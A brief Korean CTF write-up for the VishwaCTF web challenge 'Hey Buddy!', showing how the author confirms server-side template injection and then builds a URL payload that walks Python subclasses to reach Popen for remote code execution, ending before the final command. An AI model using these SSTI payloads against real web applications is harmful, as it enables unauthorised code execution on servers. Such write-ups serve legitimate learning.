Vishwactf web write up
회사 복귀를 위한 재활용 CTF write up 1. Hey Buddy! 문제에 접속하면 심플한 입력 페이지가 나오며 간단하게 {{5*'5'}} 를 넣어보면 SSTI 가 되는 것을 확인 할 수 있다. https://h3y-buddy.vishwactf.com/submit?name={{5*5}} 따라서 SSTI가 된다는 점을 알게 되었으며 flag파일을 찾기 위해 RCE를 하기로 했다 이를 위해 Popen 함수를 찾게 되었고 확인 해본 결과 213번째 인덱스가 Popen이라는 것을 알게 되었다. https://h3y-buddy.vishwactf.com/submit?name={{%27%27.__class__.__mro__[1].__subclasses__()[213]}} 따라서 Popen 함수를 이용하여 RCE..
